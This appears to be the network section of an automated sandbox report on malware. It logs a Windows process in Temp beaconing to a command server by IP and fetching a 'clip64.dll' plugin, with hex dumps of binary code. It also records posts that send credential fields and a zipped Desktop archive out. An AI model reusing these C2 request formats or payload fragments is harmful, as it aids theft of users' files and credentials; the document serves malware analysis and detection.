                                                                                                    Apr 19, 2024 04:26:04.173455000 CEST1289INData Raw: 00 48 8d 0d c5 9a 0f 00 e9 b4 cf 0c 00 48 8d 0d 15 9b 0f 00 e9 a8 cf 0c 00 48 8d 0d 49 9b 0f 00 e9 9c cf 0c 00 48 83 ec 28 48 8d 0d 75 b8 12 00 e8 ac dc 0c 00 48 8d 0d 75 9b 0f 00 48 83 c4 28 e9 7c cf 0c 00 b8 01 00 00 00 c3 cc cc cc cc cc cc cc
                                                                                                    Data Ascii: HHHIH(HuHuH(|H\$Hl$Ht$ WAVHLTAL5GL@AAt'AB0TB82TuIIEAExAB0TAB0T+uHE3LHuED8t
                                                                                                    Apr 19, 2024 04:26:04.173497915 CEST1289INData Raw: 8b 57 10 48 8b cb e8 41 b8 06 00 48 8b 3f 48 85 ff 75 ec 48 8b 7e 10 48 85 ff 74 14 48 8b 57 10 48 8b cb e8 74 38 04 00 48 8b 3f 48 85 ff 75 ec 8b 43 28 41 ff c7 48 83 c5 20 44 3b f8 0f 8c 49 ff ff ff 48 8b 6c 24 20 4c 89 b3 20 03 00 00 41 8b fe
                                                                                                    Data Ascii: WHAH?HuH~HtHWHt8H?HuC(AH D;IHl$ L A~0IHC HL0HtD8qtiuUH ;{(|HL$(D$0DuH{HL$0H AD$0HtgfDHHE^L9 tHH1-3H;hr"H;psH`
                                                                                                    Apr 19, 2024 04:26:04.422019005 CEST1289INData Raw: 95 c0 88 46 2b 33 c0 eb 05 b8 01 00 00 00 48 8b 4c 24 78 48 33 cc e8 28 bf 0c 00 4c 8d 9c 24 80 00 00 00 49 8b 5b 20 49 8b 6b 30 49 8b e3 41 5e 5f 5e c3 48 83 ec 08 80 79 2a 00 4c 8b d9 0f 85 2e 01 00 00 80 79 28 00 48 89 1c 24 74 0c 8b 41 08 44
                                                                                                    Data Ascii: F+3HL$xH3(L$I[ Ik0IA^_^Hy*L.y(H$tADIYAAD@AC*AAIDOQADAADhAAOiQQDAADAlDiAAAA+


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    2192.168.2.449737193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:04.765908003 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:05.011949062 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:04 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:05.012571096 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:05.262514114 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:05 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    3192.168.2.449739193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:05.629507065 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:05.880311012 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:05 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:05.880964994 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:06.136245012 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:06 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    4192.168.2.449740193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:06.485609055 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:06.732579947 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:06 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:06.733300924 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:06.983726978 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:06 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0
                                                                                                    Apr 19, 2024 04:26:06.995637894 CEST69OUTGET /Pneh2sXQk0/Plugins/clip64.dll HTTP/1.1
                                                                                                    Host: 193.233.132.56
                                                                                                    Apr 19, 2024 04:26:07.242974997 CEST1289INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:07 GMT
                                                                                                    Content-Type: application/octet-stream
                                                                                                    Content-Length: 112128
                                                                                                    Last-Modified: Sun, 03 Mar 2024 11:54:32 GMT
                                                                                                    Connection: keep-alive
                                                                                                    ETag: "65e464f8-1b600"
                                                                                                    Accept-Ranges: bytes
                                                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 f6 04 b3 63 97 6a e0 63 97 6a e0 63 97 6a e0 38 ff 69 e1 69 97 6a e0 38 ff 6f e1 eb 97 6a e0 38 ff 6e e1 71 97 6a e0 b6 fa 6e e1 6c 97 6a e0 b6 fa 69 e1 72 97 6a e0 b6 fa 6f e1 42 97 6a e0 38 ff 6b e1 64 97 6a e0 63 97 6b e0 02 97 6a e0 f8 f9 63 e1 60 97 6a e0 f8 f9 6a e1 62 97 6a e0 f8 f9 95 e0 62 97 6a e0 f8 f9 68 e1 62 97 6a e0 52 69 63 68 63 97 6a e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 6a 12 e4 65 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 18 00 24 01 00 00 9a 00 00 00 00 00 00 ec 66 00 00 00 10 00 00 00 40 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 02 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 20 a1 01 00 9c 00 00 00 bc a1 01 00 50 00 00 00 00 d0 01 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 d4 14 00 00 f0 8f 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 90 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 36 23 01 00 00 10 00 00 00 24 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 34 69 00 00 00 40 01 00 00 6a 00 00 00 28 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 1c 17 00 00 00 b0 01 00 00 0c 00 00 00 92 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 00 00 00 00 d0 01 00 00 02 00 00 00 9e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d4 14 00 00 00 e0 01 00 00 16 00 00 00 a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$'cjcjcj8iij8oj8nqjnljirjoBj8kdjckjc`jjbjbjhbjRichcjPELje!$f@@ P8(@@L.text6#$ `.rdata4i@j(@@.data@.rsrc@@.reloc@B
                                                                                                    Apr 19, 2024 04:26:07.243017912 CEST1289INData Raw: 00 00 6a 20 68 08 8d 01 10 b9 60 b8 01 10 e8 0f 44 00 00 68 e0 2c 01 10 e8 7d 51 00 00 59 c3 cc cc cc 6a 20 68 2c 8d 01 10 b9 78 b8 01 10 e8 ef 43 00 00 68 40 2d 01 10 e8 5d 51 00 00 59 c3 cc cc cc 6a 14 68 50 8d 01 10 b9 90 b8 01 10 e8 cf 43 00
                                                                                                    Data Ascii: j h`Dh,}QYj h,xCh@-]QYjhPCh-=QYjhhCh.QYjhCh`.PYjhoCh.PYjhOCh /PYjh/C
                                                                                                    Apr 19, 2024 04:26:07.243056059 CEST1289INData Raw: ff ff 50 c7 85 9c fb ff ff 0f 00 00 00 c6 85 88 fb ff ff 00 e8 00 3f 00 00 c6 45 fc 06 8d b5 88 fb ff ff 83 bd 9c fb ff ff 10 8b bd 88 fb ff ff 8b 95 e8 fb ff ff 0f 43 f7 8b 85 ec fb ff ff 8b 8d 98 fb ff ff 2b c2 89 b5 b0 fb ff ff 89 95 ac fb ff
                                                                                                    Data Ascii: P?EC+Q;wCCPs VQTDEr+Hr#+QW9H
                                                                                                    Apr 19, 2024 04:26:07.243096113 CEST1289INData Raw: a1 50 b9 01 10 41 81 f9 00 10 00 00 72 16 8b 50 fc 83 c1 23 2b c2 83 c0 fc 83 f8 1f 0f 87 ef 00 00 00 8b c2 51 50 e8 f7 43 00 00 83 c4 08 c7 05 60 b9 01 10 00 00 00 00 c7 05 64 b9 01 10 0f 00 00 00 c6 05 50 b9 01 10 00 0f 10 06 0f 11 05 50 b9 01
                                                                                                    Data Ascii: PArP#+QPC`dPP~Ff`FFUr(MBrI#+wzRQCEUEEEr(MBrI#+w1RQ;CtuZ
                                                                                                    Apr 19, 2024 04:26:07.243134975 CEST1289INData Raw: 00 00 c6 06 00 c7 45 fc 00 00 00 00 0f 57 c0 66 0f d6 45 e4 c7 45 ec 00 00 00 00 68 00 04 00 00 c7 45 d0 01 00 00 00 c7 45 e4 00 00 00 00 c7 45 e8 00 00 00 00 c7 45 ec 00 00 00 00 e8 09 3f 00 00 8b f8 b9 00 01 00 00 83 c8 ff 89 7d e4 83 c4 04 8d
                                                                                                    Data Ascii: EWfEEhEEEE?}UUE3EB@|E3M3U_9PvxErEt\xFNU;Ns~AFrDuEuQ
                                                                                                    Apr 19, 2024 04:26:07.243174076 CEST1289INData Raw: 00 00 89 4d cc c6 06 00 bb 01 00 00 00 33 ff 89 5d d0 85 c9 0f 8e e4 00 00 00 0f 1f 40 00 c7 45 e4 00 00 00 00 c7 45 e8 0f 00 00 00 c6 45 d4 00 3b c7 0f 82 14 01 00 00 2b c7 b9 02 00 00 00 3b c1 0f 42 c8 83 7d 1c 10 8d 45 08 0f 43 45 08 51 03 c7
                                                                                                    Data Ascii: M3]@EEE;+;B}ECEQMP/]EE}jCEjPvNV];sAFrDuEuQ2EUr(MBrI#+wpRQ(9;}}
                                                                                                    Apr 19, 2024 04:26:07.243215084 CEST1289INData Raw: 45 fc 00 00 00 00 8d 4d c0 6a 24 68 50 8e 01 10 c7 45 d0 00 00 00 00 c7 45 d4 0f 00 00 00 c6 45 c0 00 e8 ce 2a 00 00 c6 45 fc 01 8b 45 18 85 c0 75 07 33 f6 e9 dc 00 00 00 33 ff 85 c0 0f 84 cd 00 00 00 66 90 c7 45 e8 00 00 00 00 c7 45 ec 0f 00 00
                                                                                                    Data Ascii: EMj$hPEEE*EEu33fEEE;u+;B}ECEQMPs*EEePN(EEP7(E0EUr,MBrI#+
                                                                                                    Apr 19, 2024 04:26:07.243257999 CEST1289INData Raw: 89 0d 00 00 00 00 59 5f 5e 8b e5 5d c3 e8 ea 68 00 00 cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 20 2b 01 10 64 a1 00 00 00 00 50 83 ec 40 a1 08 b0 01 10 33 c5 89 45 f0 56 50 8d 45 f4 64 a3 00 00 00 00 83 ec 18 c7 45 fc 01 00 00 00 8b cc 89
                                                                                                    Data Ascii: Y_^]hUjh +dP@3EVPEdEejhxAA{%EE ePV#EEPD#ME(0EEeP##EjhAA%Ed0
                                                                                                    Apr 19, 2024 04:26:07.243298054 CEST1289INData Raw: 10 f3 0f 7e 46 10 66 0f d6 05 90 b9 01 10 c7 46 10 00 00 00 00 c7 46 14 0f 00 00 00 c6 06 00 8b 55 cc 83 fa 10 72 2c 8b 4d b8 42 8b c1 81 fa 00 10 00 00 72 14 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 0f 87 aa 12 00 00 52 51 e8 a5 2a 00 00 83 c4
                                                                                                    Data Ascii: ~FfFFUr,MBrI#+RQ*uEePlEjhAAV E0EEEHE;0+;B}ECEMVP r.ArP
                                                                                                    Apr 19, 2024 04:26:07.243374109 CEST1289INData Raw: c4 30 c7 45 c8 00 00 00 00 c7 45 cc 0f 00 00 00 c6 45 b8 00 8d 48 ff b8 b0 b9 01 10 39 0d c0 b9 01 10 0f 42 0d c0 b9 01 10 83 3d c4 b9 01 10 10 51 0f 43 05 b0 b9 01 10 8d 4d b8 50 e8 99 1b 00 00 8b 0d c4 b9 01 10 83 f9 10 72 2e a1 b0 b9 01 10 41
                                                                                                    Data Ascii: 0EEEH9B=QCMPr.ArP#+wQPu%EU~EMfAA9B=RCPMt|
                                                                                                    Apr 19, 2024 04:26:07.490305901 CEST1289INData Raw: fa 10 72 2c 8b 4d b8 42 8b c1 81 fa 00 10 00 00 72 14 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 0f 87 d4 08 00 00 52 51 e8 b6 20 00 00 83 c4 08 83 ec 18 8b cc 89 65 d4 68 78 b8 01 10 e8 7f 14 00 00 83 ec 18 c6 45 fc 12 8b cc 68 c8 b9 01 10 e8 6c
                                                                                                    Data Ascii: r,MBrI#+RQ ehxEhlME0t|r.ArP#+dQP? ~FfFFUr,


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    5192.168.2.449741193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:07.348438978 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:07.592777967 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:07 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:07.593668938 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:26:07.841701984 CEST196INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:07 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    6192.168.2.449742193.233.132.56806960C:\Windows\System32\rundll32.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:07.803128958 CEST176OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 21
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d
                                                                                                    Data Ascii: id=246122658369&cred=
                                                                                                    Apr 19, 2024 04:26:08.051520109 CEST190INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:07 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:14.943864107 CEST172OUTPOST /Pneh2sXQk0/index.php?wal=1 HTTP/1.1
                                                                                                    Content-Type: multipart/form-data; boundary=----NjE0MA==
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 6300
                                                                                                    Cache-Control: no-cache
                                                                                                    Apr 19, 2024 04:26:14.943986893 CEST140OUTData Raw: 2d 2d 2d 2d 2d 2d 4e 6a 45 30 4d 41 3d 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36
                                                                                                    Data Ascii: ------NjE0MA==Content-Disposition: form-data; name="data"; filename="246122658369_Desktop.zip"Content-Type: application/octet-stream
                                                                                                    Apr 19, 2024 04:26:14.944045067 CEST8OUTData Raw: 50 4b 03 04 14 00 00 00
                                                                                                    Data Ascii: PK
                                                                                                    Apr 19, 2024 04:26:14.944065094 CEST8OUTData Raw: 08 00 56 70 44 57 25 85
                                                                                                    Data Ascii: VpDW%
                                                                                                    Apr 19, 2024 04:26:14.944118977 CEST8OUTData Raw: f7 1e 81 02 00 00 02 04
                                                                                                    Data Ascii:
                                                                                                    Apr 19, 2024 04:26:14.944118977 CEST8OUTData Raw: 00 00 17 00 00 00 5f 46
                                                                                                    Data Ascii: _F
                                                                                                    Apr 19, 2024 04:26:14.944174051 CEST8OUTData Raw: 69 6c 65 73 5f 5c 43 55
                                                                                                    Data Ascii: iles_\CU
                                                                                                    Apr 19, 2024 04:26:14.944174051 CEST8OUTData Raw: 52 51 4e 4b 56 4f 49 58
                                                                                                    Data Ascii: RQNKVOIX
                                                                                                    Apr 19, 2024 04:26:14.944192886 CEST8OUTData Raw: 2e 78 6c 73 78 0d 93 d9
                                                                                                    Data Ascii: .xlsx
                                                                                                    Apr 19, 2024 04:26:14.944258928 CEST8OUTData Raw: 91 45 21 08 05 ff a7 ea
                                                                                                    Data Ascii: E!
                                                                                                    Apr 19, 2024 04:26:14.944258928 CEST8OUTData Raw: 05 85 8a 2b 8a bb 62 fe
                                                                                                    Data Ascii: +b
                                                                                                    Apr 19, 2024 04:26:15.213531017 CEST190INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:15 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    7192.168.2.449743193.233.132.56805900C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Apr 19, 2024 04:26:08.203963041 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:26:08.450815916 CEST219INHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:26:08 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0
                                                                                                    Apr 19, 2024 04:26:08.451720953 CEST310OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
